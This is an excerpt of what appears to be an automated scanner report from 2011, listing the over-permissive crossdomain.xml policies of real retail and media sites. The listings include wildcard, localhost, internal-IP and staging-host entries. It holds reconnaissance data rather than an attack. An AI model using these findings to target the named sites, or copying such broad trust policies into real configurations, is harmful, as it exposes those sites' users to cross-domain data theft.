<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.63. http://login.dotomi.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1305510844202398; path=/
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.64. http://media.restorationhardware.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.restorationhardware.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.restorationhardware.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 16 May 2011 11:53:22 GMT
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
